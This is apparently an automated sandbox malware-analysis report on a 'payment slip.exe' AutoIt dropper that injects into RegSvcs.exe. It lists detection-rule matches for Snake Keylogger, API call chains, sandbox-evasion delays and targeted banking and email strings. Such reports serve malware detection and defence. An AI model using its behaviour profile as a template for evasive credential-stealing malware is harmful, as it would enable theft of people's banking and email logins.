Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: payment slip.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: payment slip.exe, 00000000.00000000.1368466237.00000000000F2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e84a762f-2
Source: payment slip.exe | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c9ef72f2-7
Source: initial sample | Static PE information: Filename: payment slip.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009D5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\payment slip.exe | Code function: String function: 0004F9F2 appears 40 times
Source: C:\Users\user\Desktop\payment slip.exe | Code function: String function: 00039CB3 appears 31 times
Source: C:\Users\user\Desktop\payment slip.exe | Code function: String function: 00050A30 appears 46 times
Source: payment slip.exe, 00000000.00000003.1381716024.0000000003E2D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs payment slip.exe
Source: payment slip.exe, 00000000.00000003.1380782423.0000000003C83000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs payment slip.exe
Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs payment slip.exe
Source: payment slip.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@4/4
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A37B5 GetLastError,FormatMessageW,0_2_000A37B5
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000910BF AdjustTokenPrivileges,CloseHandle,0_2_000910BF
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000916C3
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_000A51CD
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_000BA67C
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_000A648E
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000342A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\payment slip.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut72B7.tmpJump to behavior
                  Source: payment slip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\payment slip.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.00000000027D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.00000000027C7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002783000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: payment slip.exeReversingLabs: Detection: 23%
                  Source: payment slip.exeVirustotal: Detection: 22%
Source: unknown | Process created: C:\Users\user\Desktop\payment slip.exe "C:\Users\user\Desktop\payment slip.exe"
Source: C:\Users\user\Desktop\payment slip.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\payment slip.exe"
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: payment slip.exe | Static file information: File size 1065472 > 1048576
Source: payment slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: payment slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: payment slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: payment slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: payment slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: payment slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: payment slip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP | source: payment slip.exe, 00000000.00000003.1381560458.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, payment slip.exe, 00000000.00000003.1387805550.0000000003D50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: payment slip.exe, 00000000.00000003.1381560458.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, payment slip.exe, 00000000.00000003.1387805550.0000000003D50000.00000004.00001000.00020000.00000000.sdmp
Source: payment slip.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: payment slip.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: payment slip.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: payment slip.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: payment slip.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00050A76 push ecx; ret 0_2_00050A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05F486FD push ecx; ret 2_2_05F486FF
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0004F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0004F98E
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_000C1C41
Source: C:\Users\user\Desktop\payment slip.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\payment slip.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-98126)
Source: C:\Users\user\Desktop\payment slip.exe | API/Special instruction interceptor: Address: 3B03234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599782
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599657
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598329
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598079
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597329
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597079
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596329
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596079
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595329
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595079
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594329
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7983
Source: C:\Users\user\Desktop\payment slip.exe | API coverage: 3.8 %
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DBBE
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0006C2A2 FindFirstFileExW,0_2_0006C2A2
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A68EE FindFirstFileW,FindClose,0_2_000A68EE
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000A698F
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D076
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D3A9
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A9642
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A979D
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000A9B2B
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000A5C97
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594082Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593954Jump to behavior
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
